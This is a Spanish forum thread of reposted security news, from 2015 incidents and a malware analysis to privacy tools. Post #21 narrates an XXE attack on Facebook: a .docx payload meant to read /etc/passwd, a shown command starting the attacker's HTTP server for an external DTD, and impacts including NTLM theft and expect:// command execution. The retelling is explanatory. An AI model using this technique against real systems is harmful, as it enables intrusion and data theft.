Además de lo anterior, dentro del código del script, seguimos encontrando funcionalidades similares a todas las muestras analizadas. Precisamente una de estas son los mecanismos utilizados para proteger en entornos virtualizados, particularmente para este grupo de muestras analizadas VMware y VirtualBox.




Características de persistencia

Una de las características comunes a la mayoría de los códigos maliciosos es la capacidad que tienen para persistir en un sistema, y las muestras analizadas no son la excepción. De hecho tienen todas las mismas dos funciones para modificar los registros de Windows e iniciarse con cada nuevo arranque del sistema.




Como se ve en la gráfica en la anterior, el script verifica el tipo de usuario que está activo en la máquina para saber qué tipo de modificación hacer. Además puede detener e iniciar procesos relacionados con esta configuración en el sistema operativo.

Estilo de ofuscamiento

Si bien al ver las imágenes anteriores puede resultar bastante claro lo que realizan estos códigos maliciosos, el análisis no resulta tan sencillo si partimos de los archivos ofuscados. En todas las muestras analizadas fue posible encontrar la misma técnica de ofuscamiento: dos funciones anidadas. Una convierte de hexadecimal a ASCII, y otra invierte la cadena de caracteres.




Una característica adicional que nos da una idea de que estas muestras están relacionadas y de hecho han ido evolucionando es el hecho de encontrar la misma técnica pero utilizada de forma diferente, tanto así que en las primeras muestras que pudimos recuperar el nombre de las funciones no estaba ofuscado, por lo que su análisis se hace más sencillo.



Robando contraseñas de Facebook

Dentro de las funciones maliciosas más relevantes de todos los códigos maliciosos, supiumos que están diseñados para robar la información relacionada con Facebook. Tal como se puede ver en la siguiente imagen, el código malicioso cuenta con una función que va copiando todo al portapapeles. De esta manera, el atacante logra recopilar información privada del usuario:




Además de lo anterior, el atacante también obtiene información sensible acerca del sistema operativo utilizado por el usuario y los perfiles creados en la máquina. De esta manera se hace con bastante información que le puede ser útil para obtener algún tipo de ganancia económica o incluso llevar adelante otro tipo de ataques.


Después de todo lo anterior es importante tener en cuenta, como ya lo hemos mencionado, que los atacantes están constantemente evolucionando sus amenazas y por lo tanto es necesario estar al tanto de cómo es que propagan sus amenazas. Si bien las técnicas de Ingeniería Social no varían mucho, las utilizadas para evadir los sistemas de seguridad van cambiando.


Muestras analizadas


Nombre de la muestra   SHA1
Informes...   5D7B9F19DE6A3CED1C615828830DF958DB3AE79F
Alerta...   F98D73E85638BF33779018947D38648B329F7756
Bank slip.scr   8CF73FC79AADB9E46BB03414CFD5550C476B7850
Document.scr   EC27C71D72982597C2F2010B3350810F64DA1C52
Documentos 2.scr   EC1A8A3A0D0C73E807F1A552567655BCE88EC3C1
IMG_780809535.scr   7B51B8FA40AB53271DCECB012AC59F9A8F9BD932
Invoice.scr   12D39D98892FC2A36C6AE847111FF4D4315DB28F
Reporte...   F0304CF0FC3CFEF7644154675A9948A538CB6C9A
Transunion...   2C4DF2B7A9EE2F8CC773E9ADFA2FEFC80E39F5BB


FUENTE|welivesecurity.com
#13


2015 ha sido un año prolífico en cuanto a número e intensidad de ciberataques e indicentes de ciberseguridad, y por qué no, también ha sido divertido. Cada año son muchos los avances que se hacen en materia de seguridad, pero también cada vez más los ataques y vulnerabilidades que se descubren. Si el año pasado todo el mundo hablaba del famoso ataque a Sony o el comentado Celebgate, este año han sido muchas las noticias que han marcado el sector de la ciberseguridad, en el nadie se ha quedado sin un zasca: desde los usuarios, hasta las empresas y los gobiernos. Estos han sido los grandes afectados por incidentes de ciberseguridad este año.

8. Los propietarios de ordenadores Lenovo

Febrero de 2015, sale a la luz que Lenovo vende ordenadores con malware preinstalado de fábrica, el famoso Superfish. Agosto de 2015, se descubre que Lenovo instala crapware en sus equipos... ¿otra vez? Sí, pero espera. Septiembre de 2015, Lenovo vuelve a instalar spyware en sus ordenadores. Sin duda, la polémica con Lenovo ha sido uno de los incidentes de seguridad más comentados este año, sobre todo su insistencia a caer en la misma piedra, a pesar de que incluso llegaron a darles un toquecito atacando su página web. El asunto es que no era un caso aislado, este año han salido otros casos similares a la palestra.

7. Los coches conectados


¿Tomar el control un coche (en movimiento) de forma remota? Sí, nuestros temores se hacen realidad: dos expertos en seguridad demostraron este verano cómo podían aprovecharse de una vulnerabilidad del sistema Uconnect para tomar el control de algunos vehículos Chrysler. Activar el aire acondicionado, la radio, desactivar el acelerador en medio de una autopista... ¿La buena noticia? Chrysler retiró los coches que podían ser vulnerables a ataques. ¿La mala noticia? No va a ser la primera vez, ni la única que veamos este tipo de hackings. Al tiempo...

6. Los que decían: "Apple no tiene malware"

No ha sido un buen año para Apple. Y no me refiero al Apple Watch, sino en cuanto a ciberseguridad. Un fallo en la aplicación Mail de Apple permitía robar las contraseñas de iCloud, una cadena de vulnerabilidades en OS X y en iOS podían abrir las puertas a los atacantes, un malware para iOS ha robado cientos de miles de cuentas de Apple en iPhones con jailbreak, y para rematar, XcodeGhost: el malware que atacaba la tienda oficial de aplicaciones de Apple y tuvo que retirar cientos de aplicaciones que recopilaban información de los usuarios. Vamos, que a más de uno le salió una sonrisita (o incluso una carcajada) al ver estas noticias. Pues resulta que sí. Apple también es vulnerable.


5. 1000 millones de Android


¿Te suena Stagefright, verdad? Eso es porque este año se descubrió que esta vulnerabilidad (considerada el nuevo Heartbleed para Android) podía afectar al 95% de los usuarios de Android. Lo inquietante es que los atacantes podrían aprovecharse de esa vulnerabilidad para ejecutar código de forma remota, tan sólo conociendo el número de teléfono de la víctima. Y como toda buena historia suele tener segunda parte, esta no iba a ser menos: unos meses más tarde volvía Stagefright para amenazar a otros mil millones de dispositivos.

4. Los usuarios de Flash

No hay una noticia en concreto, tenemos una categoría de incidentes de seguridad relacionados con Flash. El patito feo de los programas, está siendo ya rechazado por gran parte del sector debido a sus continuas vulnerabilidades y zero-days. Su año se puede resumir en el bucle: "Vulnerabilidad encontrada para Flash Player", "Adobe lanza parche para solucionar vulnerabididad en Flash". "Vulnerabilidad encontrada para Flash Player", "Adobe lanza parche..."


3. Los paranoicos defensores de la privacidad

Desde que empezamos a oír las palabras NSA y Snowden, nuestras vidas no han sido lo mismo. La conciencia sobre la privacidad ha crecido considerablemente, y con razón. Porque los casos de pseudoespionaje que han salido a la luz este año probablemente sean sólo la punta del iceberg de lo que las compañías son capaces de hacer. Televisores inteligentes que espían lo que ocurre delante de ellos, Google escuchando las conversaciones que mantenemos delante del ordenador... Si eres de los maniáticos de la privacidad puedes irte a vivir a una cueva, o apuntar los consejos de privacidad que da un experto en el tema.

2. Hacking Team

Los hackers, hackeados. La controvertida firma de software italiana Hacking Team, conocida por suministrar de forma legal herramientas de espionaje para gobiernos, fue víctima de un robo de información. Nada menos que 500 Gb de datos confidenciales, que WikiLeaks se apresuró a colgar online para que cualquiera pudiera bucear entre los millones de correos electrónicos con todo tipo de información de los clientes del equipo de hackers. ¿quién estuvo detrás? No se sabe, pero los propios afectados apuntan a un gobierno o alguien con un gran poder económico.

1. Los clientes de Ashley Madison

Sin duda el incidente más comentado este año, que ha dado para millones de titulares. Y es que, que se filtren los datos robados de 40 millones de usuarios de una web de citas extramatrimoniales da mucho juego. Pero el drama estaba servido: su CEO tuvo que dimitir, tras descubrirse además que también engañaba a su mujer (tendría que probar que el servicio funcionaba, ¿no?), y cientos de clientes fueron chantajeados por este motivo.


Estos han sido los grandes perdedores de este año en materia de ciberseguridad. Pero, ¿qué deparará 2016? Muchos han hecho ya sus cábalas, y todo parece indicar que el año que viene también será un año "divertido" para la seguridad. ¿Cuáles dirías que han sido los ciberataques que han marcado 2015?


FUENTE| globbsecurity
#14
Un buen golpe o una llamarada causan estragos en los platos de un disco duro, pero no siempre los destruye. Un experto en seguridad informática nos da la receta para eliminar los datos para siempre.




En uno de los capítulos de la serie Mr. Robot, un paranoico Elliot Alderson, el 'hacker' que la protagoniza, decide eliminar la comprometedora información que guarda sus discos duros. A Alderson no se le ocurre formatearlos, sino que se decanta por un método más drástico: taladrarlos (también mete un par de tarjetas de memoria en el microondas).

La idea no es para nada disparatada, porque, para garantizar que los datos de un disco duro desaparecen de la faz de la Tierra, hace falta algo más que una reordenación y limpieza informática. Quizá, incluso, el 'hacker' se quedara corto. ¿Hubiera sido mejor echárselos a los peces? ¿Quemarlos? ¿Arrojarlos por la ventana de un quinto piso? ¿Colocar un potente imán cerca?

Aunque no todas las agresiones resultan igual de efectivas, cada estrategia tiene unas consecuencias que Lorenzo Martínez, experto en seguridad informática y director técnico de Securízame, ha explicado a Teknautas.


Los martillazos tienen un efecto variable. No es lo mismo si el dispositivo estaba funcionando cuando le damos el porrazo que si permanecía desconectado.


"Lo normal es que no le sienten bien los chapuzones", nos dice Martínez cuando le preguntamos qué pasa si sumergimos en agua un disco duro. Los dispositivos tradicionales (los que no son SSD, discos en estado sólido) están compuestos por elementos mecánicos: al menos un motor que hace rotar los platos o discos, y los cabezales que leen y escriben sobre su superficie magnéticamente.

Pese a estar recubiertos por carcasas fabricadas con aleaciones de plomo, que mantienen hermético el mecanismo, "la electrónica y los conectores quedan al aire por la parte de abajo", asegura el experto, así que no presagia un buen futuro para los bañistas.

Entonces, ¿el líquido estropea el dispositivo para siempre? Recubrirlo de arroz no va a servir de nada, pero lo cierto es que, algunas veces, la información (o parte de ella) aún podría recuperarse, siempre que los platos no hayan sufrido demasiados daños.




"Hay empresas que cuentan con cámaras blancas [habitaciones con temperatura, humedad e higiene especiales] y discos duros 'donantes' que permiten intercambiar parte de los mecanismos que no se han roto, para obtener los datos y volver a guardarlos", indica Martínez.

En el caso del fuego, también depende de lo que se haya quemado: si solo han ardido la carcasa y la electrónica o también lo han hecho los platos. "Si el tiempo de exposición es el suficiente para destrozar los discos, ya puedes tener un buen backup", advierte el director técnico de Securízame.

A base de golpes.


También los martillazos y golpes tienen un efecto variable. No es lo mismo si el dispositivo estaba funcionando cuando le asestamos el porrazo que si permanecía desconectado y el lector, por tanto, en posición de seguridad.

"Un disco mecánico gira a miles de revoluciones por minuto, así que el daño puede ser ínfimo o muy grande", explica Martínez. Los impactos hacen que los cabezales se acerquen demasiado a los platos, los rayen y "fin de lo que haya guardado ahí". Algo similar ocurre si decidimos arrojarlo por la ventana de un quinto piso: "Depende de dónde caiga, cómo caiga...", indica el experto.

En realidad, una vez desprovistos de su caparazón, los discos son sensibles a cualquier agresión externa. "Roces mínimos o pelusas atraídas por electricidad estática influyen en la integridad de la información almacenada", asegura Martínez.

Así, sin su carcasa, frotar un imán contra la superficie de los platos también causaría estragos. Uno muy potente los dañaría incluso con la cubierta: "Es una manera homologada de hacerlo, aunque confío más en la destrucción física", aclara el experto.

"Gracias a la evolución de la tecnología, los discos duros de los ordenadores son más resistentes y algunos tienen hasta airbags para amortiguar caídas", prosigue. Las máquinas de entornos industriales, por ejemplo, están preparadas para soportar grandes presiones.

En los SSD, la información se almacena en una memoria compuesta por semiconductores (carecen de platos). Son más rápidos y resistentes, pero una vez han sufrido un daño contundente que haya destruido alguna celda, los datos quedan inaccesibles.

El mejor método es lijar la superficie y taladrar el disco completo. Y si después se quema, mejor que mejor.

Para Martínez, los formateos exhaustivos, en los que se llevan a cabo varias pasadas, son suficientes "porque se sobreescribe la información". Sin embargo, la destrucción física proporciona la garantía definitiva.

Alderson no se equivocaba, pero le faltó un paso para causar un destrozo irreversible. La receta del desastre, según el experto de Securízame, es la elegida por los servicios de inteligencia británica para borrar de los ordenadores de The Guardian la información de la NSA filtrada por Edward Snowden, descrita por uno de sus corresponsales en The Snowden Files: The Inside Story of the World's Most Wanted Man. "El mejor mecanismo para hacer irrecuperable la información de un disco duro es lijar la superficie y taladrar el disco completo", explica Martínez. Y si después se quema, mejor que mejor.


FUENTE| elconfidencial







#15


Script es una utilidad de Unix presente en la mayoría de distribuciones GNU/Linux, que nos permite grabar todas las operaciones ejecutadas en la terminal. Va más allá de lo que ofrece el comando history, ya que también nos proporciona todas las salidas de los diferentes comandos y operaciones que realicemos.

La forma más sencilla de iniciarlo es abrir una terminal y escribir:

Código: php
script


que automáticamente nos crea un fichero llamado typescript y empieza a grabar el contenido de la sesión, con los diversos comandos que vayamos ejecutando.

Podemos parar esa captura en cualquier momento, haciendo Crlt+D o escribiendo

Código: php
exit





Si no nos gusta ese nombre de typescript o queremos diferenciar entre sesiones le podemos dar otro cualquiera. Por ej:

Código: php
script registro.txt



Por defecto cada vez que ejecutamos el comando si tenemos un archivo de logs anterior con el mismo nombre lo sobreescribe. Pero tenemos la opción de utilizar el parámetro -a para anexar nuevo contenido a dicho archivo (en este caso, al archivo por defecto typescript) y evitar borrar el viejo.

Código: php
script -a


Como habréis deducido el archivo resultante lo podemos examinar con cualquier editor de texto (geany, gedit, nano, kate, etc.), pero vamos a ir un poco más allá y ver como examinarlo desde la terminal a la velocidad de ejecución original.

Primero lanzamos el programa, añadiéndole ahora un nuevo elemento: un archivo que nos marca los tiempos de script.

Utilizando el archivo por defecto typescript ejecutaríamos

Código: php
script -t=tiempo.txt


Si utilizamos un nombre de archivo diferente al predeterminado typescript, quedaría algo así:

Código: php
script -t=tiempo.txt registro.txt


en cualquiera de los dos caso para finalizar la grabación hacemos Ctrl + D o escribimos:

Código: php
exit


Ahora llega la parte más divertida, la de reproducir el archivo desde la shell con el comando scriptreplay:

Código: php
scriptreplay -t=tiempo.txt





De nuevo retomando el ejemplo anterior (registro.txt), si utilizáis un fichero diferente a typescript varía ligeramente la sintaxis:

Código: php
scriptreplay -t=tiempo.txt registro.txt


Otros programas interesantes a la hora de guardar y reproducir sesiones de terminal –especialmente si os apetece compartir vuestro trabajo– son asciinema o Termrecord, que crean archivos html que se pueden incrustar en páginas web.


FUENTE| No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


#16

La reproducción de complementos multimedia, así como la publicidad online, implica el rastreo y seguimiento de la actividad delos usuarios a los que se muestran. Compañías como Google, con la intención de servir publicidad personalizada al usuario que navega por Internet, toman información de su uso del navegador web. Pero, ¿cómo podemos ver qué sitios web nos están rastreando?

La herramienta que nos ocupa, Panopticlick, es completamente gratuita y de código abierto, y nos permite analizar el navegador web que utilizamos para conocer qué 'agentes' están rastreando nuestra conexión a Internet. La EFF, según explican en RedesZone, ha actualizado recientemente esta herramienta para incluir nuevos módulos que se encargan de comprobar, sobre nuestro navegador web, qué peticiones se están haciendo para rastrear nuestro tráfico web.

Entre sus características nos encontramos con cuatro niveles de análisis. En un primer nivel, la herramienta comprueba el rastreo de anuncios, y en un segundo nivel el rastreo por parte de terceros sobre nuestra conexión a Internet. Por otro lado, esta herramienta también es capaz de comprobar si nuestro navegador cumple con las reglas Do Not Track y, además, puede analizar si nuestro navegador oculta de forma correcta las huellas de rastreo.


Un análisis sencillo para comprobar quién rastrea nuestro navegador.

Para aplicar el análisis, simplemente tenemos que acceder a su página web No tienes permitido ver los links. Registrarse o Entrar a mi cuenta y pulsar sobre el botón "Test Me" para que, de forma automática, la herramienta analice nuestro navegador web. Una vez que concluye, ya podremos ver cuáles son los puntos con los que cumple nuestro navegador web y, en caso de que no se cumpla alguna pauta, podemos ver sugerencias sobre las posibles soluciones que podemos aplicar. Además del navegador web, es fundamental prestar atención a las extensiones y plugins que tenemos instalados y que, por supuesto, también interfieren en el proceso.

Para proteger nuestra privacidad con el navegador web, no obstante, tenemos algunas extensiones especiales que se encargan de impedir conexiones no deseadas. De esta forma, además, podremos obligar a que se cumplan las reglas Do Not Track que, en navegadores como Firefox en sus últimas versiones, no se respetan según establece la EFF.


FUENTE| adslzone
#17


En un principio Google era solo un motor de búsqueda pero las propiedades de Google han aumentado incluyendo servicios como Android, Gmail, Google+, YouTube, Docs, Drive y otros, muchos. Ya es por todos conocido que Google almacena gran cantidad de información para ofrecer los resultados de búsqueda y los anuncios más relevantes, pero, ¿alguna vez te has parado a pensar qué datos personales estás compartiendo con Google y, en algunos casos, con cualquiera que los busque en Google? En Kaspersky Lab han reflexionado sobre este tema y han resumido qué debe hacer el usuario frente a esta situación.

Aunque es fácil marcar casillas y aceptar términos sin leerlos, Google se ha dado cuenta de que no es Facebook y en cierta medida, valora la privacidad. Para demostrar su compromiso ha introducido una nueva herramienta llamada "Sobre mí", que te muestra qué aspectos estás compartiendo en la plataforma. Para empezar a usar este mecanismo puedes visitar: "No tienes permitido ver los links. Registrarse o Entrar a mi cuenta" y seleccionar "Comprobar privacidad".

En cuanto selecciones "Empezar ahora", la página te mostrará tu privacidad online y lo que estás compartiendo. El punto de partida es Google+. En cada paso, podrás seleccionar qué información quieres compartir y con quién. Dependiendo de qué servicios uses con tu cuenta, recibirás advertencias que, si deniegas compartirlas con Google, en algunos productos este hecho repercutirá en el funcionamiento de la aplicación o del sistema operativo.

Incluso si tienes las puertas blindadas en la configuración de la seguridad, esta herramienta que ofrece Google es una buena solución para asegurar que no compartes datos valiosos a través de múltiples plataformas. Este es solo el principio de las medidas que el usuario debe tomar para proteger sus datos frente a los anunciantes, proveedores de aplicaciones de terceros o almacenes de cookies por ello, te puedes protegerte de manera más eficiente si siguen los siguientes consejos:

Recomendaciones para estar protegido en la web:

1. Lee: es muy sencillo aceptar los "Términos y condiciones de uso" de las páginas web y ciertos servicios pero deberías leer, al menos, qué datos aceptas compartir con terceras partes.

2. No utilices la autenticación única. Puede ser lo más cómodo, pero también es el primer error que cometemos en cuanto a privacidad en la red. Cuando inicias sesión con tu cuenta de Google, ya te estás comprometiendo a compartir ciertos datos con terceros. Claro que te ahorras 10 segundos, pero ¿sabes lo que están haciendo con tus datos? O aún mejor, ¿cómo los protegen?

3. Desconfía: Tus datos son sagrados así que compártelos solamente en sitios (y con las personas) que tú quieras.

4. Lo más sencillo no es siempre lo mejor: nunca aceptes compartir tus cosas en cualquier red, aunque nadie la use. Si compartes todo fácilmente, el mundo y los motores de búsqueda podrán ver toda la información a la que accedes.

5. Utiliza una herramienta de privacidad: Siempre puedes usar Tor para seguir una navegación privada, pero esta red no es para todo el mundo. Por eso, lo más útil es utilizar soluciones que permiten al usuario seleccionar lo que comparte con páginas web de terceros.



FUENTE| globb security
#18


El cifrado cuántico, la criptografía que utiliza principios de la mecánica cuántica para intentar asegurar al 100% la confidencialidad en las comunicaciones, no es totalmente infranqueable según una investigación de científicos suecos.

El cifrado cuántico fue propuesto como teoría en 1970 y en 1984 se publicó el primer protocolo. Conocido como QDK, algunas empresas han desarrollado dispositivos bajo este protocolo desde 2002 pero en realidad pocos se han utilizado fuera de entornos de prueba.

Basado en una propiedad única de la física cuántica para cifrar y descifrar mensajes, se considera totalmente seguro para garantizar confidencialidad absoluta en la transmisión de información entre dos partes. La transmisión se logra utilizando fotones polarizados enviados entre el emisor (A) y el receptor (B) mediante un canal cuántico, por ejemplo, fibra óptica.

Utilizando la polarización de los fotones para codificar información binaria se conforma la clave secreta. Si un atacante pretende escuchar secretamente las comunicaciones durante la creación de la clave secreta, el proceso se altera advirtiéndose al intruso antes de que se transmita información privada.

Sin embargo, los investigadores suecos, aseguran que hay lagunas en la forma de trabajar de este protocolo y que no es totalmente irrompible, por ejemplo reemplazando fotones por una fuente de luz tradicional. "Con este agujero de seguridad, es posible espiar el tráfico sin ser detectado. Lo descubrimos en nuestros cálculos teóricos y nuestros colegas en Estocolmo fueron posteriormente capaces de demostrar experimentalmente este argumento'', explican.

Los investigadores detallan que este problema se puede resolver y proponen una serie de medidas para hacerlo y asegurar este cifrado cuántico.


FUENTE| muyseguridad
#19


¿Tienes un monitor VGA? Pues cuídalo porque más temprano que tarde podría convertirse en una de esas curiosas reliquias informáticas. Cuando Intel comenzó a desvelar detalles sobre su nueva familia de procesadores ya dieron datos al respecto, pero no prestamos demasiada atención y es algo curioso: Skylake ya no da soporte para puertos VGA.


Los tradicionales puertos de conexión a nuestros monitores han quedado desplazados por los monitores con estándares más recientes como DVI, HDMI o DisplayPort -y sus distintas variantes en conectores mini y micro-, pero hasta ahora los fabricantes habían seguido manteniendo ese puerto por el soporte que seguían dándole los grandes de los semiconductores. Ahora las cosas empiezan a cambiar.

VGA se despide, DVI lo hará pronto

La conexión VGA (Video Graphics Array) lleva ya mucho tiempo con nosotros:** se diseñó en 1987** y se convirtió rápidamente en el estándar de facto en la industria del PC que emergía de forma contundente en aquella década. El conector D-sub 15 con el que todos lo identificamos ha sido uno de los más extendidos en la industria, pero la evolución de esa misma industria ha hecho que hayan ido surgiendo diversas alternativas.




Los conectores DVI (Digital Visual Interface) fueron los sucesores de referencia de los puertos VGA, y durante mucho tiempo hemos visto -y seguiremos viendo, en realidad- productos que combinaban ambas opciones. Sin embargo esto será cada vez menos común, ya que la citada familia de procesadores Skylake de Intel ya no ofrece soporte para conectores VGA y de hecho su sucesor, DVI, también tiene los días contados ante el empuje de estándares más preparados para estos tiempos como HDMI y DisplayPort.


Aún veremos esta tecnología rondar nuestras vidas, eso seguro: hay muchos dispositivos que cuentan con este tipo de conexión, y la multitud de adaptadores que permiten convertir entre puertos DisplayPort, HDMI o DVI a VGA -en todas esas combinaciones- son una realidad patente que nos permiten seguir sacando jugo a esos dispositivos. Aún hay algo de vida para el puerto VGA, sí, pero los nuevos tiempos se imponen: es ley de vida.


FUENTE| xataka
#20
Un grupo de hackers amenaza con repetir los ataques del año pasado a PSN y Xbox Live estas Navidades.



Durante las Navidades del año pasado PlayStation Network y Xbox Live sufrieron un ataque por parte de Lizard Squad, unos hackers que impidieron disfrutar de los servicios online de las consolas de Microsoft y Sony.

Ahora, el grupo de hackers Phantom Squad ha amenazado con volver a repetir el mismo ataque para estas Navidades. Del mismo modo, buscan atacar los servidores de Grand Theft Auto V, Star Wars: The Old Republic y Call of Duty: Black Ops 3.

Lizard Squad realizó el ataque el año pasado para obligar a las compañías a reforzar sus sistemas de seguridad, mientras que Phantom Squad asegura que los va a realizar para demostrar que "la ciberseguridad no existe".

Nos tocará esperar a la semana que viene para comprobar si podremos disfrutar de unas Navidades tranquilas jugando online o se volverá a repetir la misma situación del año pasado.


FUENTE| No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


#21



La gente últimamente esta deseada en obtener mucha información de su victima por facebook bueno aquí le traigo un aporte sobre eso.

Facebook Seguridad Tough:

Facebook como ustedes saben es bastante seguro, debido a que muchas personas  informan errores de seguridad muy graves desde 2010 y se reparó un XML entidad externa (peligroso XXE) Procesamiento de vulnerabilidad  que afecta OpenID  a finales de 2013.

Dijeron que todos sus servidores están parcheado de acuerdo con este mensaje por su equipo de seguridad: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

El desafio:

Al final y no voy a encontrar vulnerabilidades xx después de que Facebook parcho sus servidores con la herramienta Takedown, desarrollaron pero yo desafié a mí mismo para encontrar XXE en Facebook y después de algún tiempo la excavación y la caza, me encontré con esta URL:  https: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

El Hack:

Traté de subir mi CV y fui aceptado y subido con éxito pero  sólo puedo cargar archivos PDF y DOCX pero ya sé que los archivos .docx son archivos XML comprimidos desarrollados por Microsoft, según wikipedia:  No tienes permitido ver los links. Registrarse o Entrar a mi cuenta /wiki/Office_Open_XML

Simplemente abrí MS Word 2010 después escribí un texto al azar y la guardé en mi escritorio como: CV.docx después de que he subido con éxito a Facebook y  pasó como esperaba pero debe encontrar una vulnerabilidad.

La inyección de carga útil XML dentro CV.docx leer /etc/passwd:

Rápidamente me abrí CV.docx con el programa 7zip en Windows 7 y extraje todo el contenido del archivo CV.docx entonces encontré algunos archivos xml después de eso decidí abrir este archivo: [Content_Types] .xml e inserte el código XML inocente:




El Evil Twin:

Ya tengo otro archivo ext.dtd esperando en mohaab007 directorio y aquí es el contenido de ext.dtd:




El programa de instalación:

Ahora tengo un archivo CV.docx forjado y está listo para el rock después de eso me abrió el puerto 80 en mi router a casa y comencé con python  http servidor:


Código: php

mohamed:~ mohaab007$ sudo python -m SimpleHTTPServer 80

Password:

Serving HTTP on 0.0.0.0 port 80 ...





El susto:


Inserté mi dirección IP externa y todo lo que quiero ver es una respuesta del servidor http python diciendo que algo está intentando conectarse a mí. Ahora todo está bien y luego he subido CV.docx a No tienes permitido ver los links. Registrarse o Entrar a mi cuenta  y espere un minuto, pero no paso nada.

Me dije a mí mismo que es un fracaso total y voy a revisar mi perfil de Facebook  y charlar con algunos amigos y jugar a un juego o algo así después de este largo FALLADO  intento. Perdí unos 15 minutos, charlando y navegando,  pero ahora es el momento de dejar el servidor http python,  Facebook y todo.

Iba a cerrar mi ventana de terminal y me sorprendí al ver que algo relacionado a mi servidor http python:




El impacto:



Dije WOOOOOOT   Forcé un servidor que pertenece a Facebook para conectar con el servidor HTTP de Python usando una manera disimulada y ahora puedo HACER:



1- DoS en el sistema de análisis por lo que es abierta,  e.g.No tienes permitido ver los links. Registrarse o Entrar a mi cuenta | No tienes permitido ver los links. Registrarse o Entrar a mi cuenta | file://c:/con/con

2- Escanea TCP utilizando entidades externas HTTP (incluyendo firewalls desde los servidores de aplicaciones a menudo tienen la visión mundial diferente de la del atacante)

3- El acceso no autorizado a los datos almacenados como archivos XML en el sistema de archivos del sistema de análisis (por supuesto, el atacante aún necesita una manera de obtener estos datos de nuevo)

4- DoS en otros sistemas (si se permite que el sistema de análisis de establecimiento TCP conexiones con otros sistemas)

5- NTLM robo de material de la autenticación mediante el inicio de acceso a archivos UNC a los sistemas bajo control atacante (descabellada?)

6- Una aplicación ampliamente desplegado y altamente conectado vulnerables a este ataque puede ser utilizado para ataques DDoS.

7-   Leer  sistema y archivos de la aplicación y, en algunos casos, ejecutar comandos de sistema utilizando php expect:// wrapper.



FUENTE| No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#22

La empresa antivirus MacKeeper sufrió una brecha de seguridad y se ha tenido acceso a su base de datos con más de 13 millones de clientes incluyendo nombres, direcciones de correo electrónico, nombres de usuario, hashes de contraseñas, direcciones IP, números de teléfono y información del sistema.

MacKeeper es una suite de software creada por la empresa Kromtech, que pretende hacer más seguro y estable el sistema operativo de Apple. La violación de datos fue descubierta por Chris Vickery, un investigador que fue capaz de descargar los 13 millones de registros de clientes con un total de 21 GB de datos.

Vickery dijo que descubrió "el tesoro" de MacKeeper en un momento de aburrimiento mientras buscaba datos abiertamente accesibles en Shodan. "El motor de búsqueda había indexado sus IPs [de MacKeeper] porque estaba ejecutando una instancia de MongoDB con acceso público en el puerto 27017".
Debido a esta mala configuración de MongoDB, cuatro direcciones IPs llevaron a Vickery directamente a una base de datos MongoDB, que contiene una variedad de información personal de los clientes de MacKeeper.



Aunque las contraseñas están cifradas, Vickery cree que MacKeeper utilizaba MD5 para proteger las contraseñas del cliente, permitiendo que cualquiera pueda descifrarlas en segundos utilizando herramientas de cracking.

La empresa respondió a Vickery, diciendo que no tenían ninguna evidencia de que los datos hayan sido utilizados de forma malintencionada. Aunque la empresa afirma que Vickery fue la única persona que pudo acceder a los usuarios de MacKeeper, se recomienda cambiar las contraseñas.


FUENTE| No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#23



Una de las mayores preocupaciones de los internautas está relacionada directamente con los casos de espionaje masivo que se han producido en los últimos tiempos. ¿Me están espiando? Es una pregunta bastante frecuente que se hacen los usuarios y que ahora podrán responder de forma realmente sencilla gracias a una herramienta gratuita.

SpyDetect Free
es una herramienta para Windows que permite contestar dos simples preguntas "¿Estoy siendo espiado?" y "¿Estoy siendo rastreado (monitorizado)?". Sus creadores nos explican que su principal propósito es detectar procesos que puedan estar comprometiendo la privacidad de nuestros datos. Y es que existen numerosas formas de rastrear a los usuarios, desde funciones propias del sistema operativo hasta aplicaciones maliciosas que camuflan sistemas de espionaje. Todas ellas se pueden detectar con esta herramienta.

Esta herramienta, que podremos descargar en versiones de 32 y 64 bit, está diseñada para responder de forma sencilla a las cuestiones que preocupan a los usuarios. Al ejecutarla, nos encontramos con una interfaz muy despejada coronada con un gran botón bajo el texto "Check Now" (Comprobar ahora) que en unos 60 segundos responde más abajo a las dos cuestiones principales.

"¿Estoy siendo espiado?" y "¿Estoy siendo rastreado?" son las preguntas que podremos responder de forma sencilla con esta herramienta. Para la primera pregunta, se controlará la existencia de procesos que controlen lo que estamos tecleando en tiempo real. En cuanto al rastreo, se analizará el software presente en el equipo para ver si alguno envía información periódica sobre lo que hacemos.

Aunque no se trata de la solución definitiva, sí es una forma muy rápida de detectar una gran mayoría de procesos que pueden estar espiando nuestro ordenador con Windows. Esta herramienta se une a otras que tenemos en el mercado.


FUENTE| adslzone
#24

Si hay una tema que genera encendidos debates entre los aficionados a la tecnología, sin duda es el enfrentamiento entre Android e iOS. Son dos sistemas operativos móviles ya muy maduros, y hoy vamos a conocer 10 motivos por las que Android es mejor que iOS. Desde luego, argumentos a favor de la plataforma de Google no nos van a faltar.

No podemos negar que el iPhone ha sido el dispositivo que definió el smartphone moderno, pero Android ha retocado y mejorado hasta el último detalle. En muchos aspectos, podemos decir que el alumno ha superado al maestro. Así que conozcamos los 10 motivos por las que Android es mejor que iOS detallados uno por uno:


10 aspectos mejores en Android que en iOS


- Apps externas: en iOS resulta bastante complicado cargar aplicaciones de fuera de la tienda oficial, y requiere modificar el sistema. En Android disponemos de la enorme libertad de poder usar programas ajenos a Google Play, lo que permite encontrar casi cualquier app que podamos imaginar.

- Personalización: sin necesidad de procesos complicados o de perder la garantía, podemos personalizar profundamente el sistema operativo, tanto en su aspecto como en funcionalidades. Al final, la versatilidad es mucho mayor.

- Notificaciones: la verdad es que Android siempre ha destacado en las notificaciones, y su sistema sigue por delante del de iOS, a pesar de que Apple ha copiado varias veces a Google. Pero Android se mantiene a la cabeza, cada vez con más ideas nuevas, una razón por la que Android supera a iOS.

- Aplicaciones de Google: en Android tenemos las mejores versiones de Gmail, Maps, Fotos, Drive o Chrome. Los servicios que ofrece Google son muy buenos, así que resulta interesante poder disfrutarlos en las mejores condiciones posibles.

- Hardware variado: iOS sólo soporta unos pocos dispositivos carísimos que vende Apple, pero Android se incluye en cientos de modelos distintos. Eso significa que tenemos más fácil encontrar el aparato adecuado para nosotros, y a mejor precio, gracias a la competencia entre las marcas.

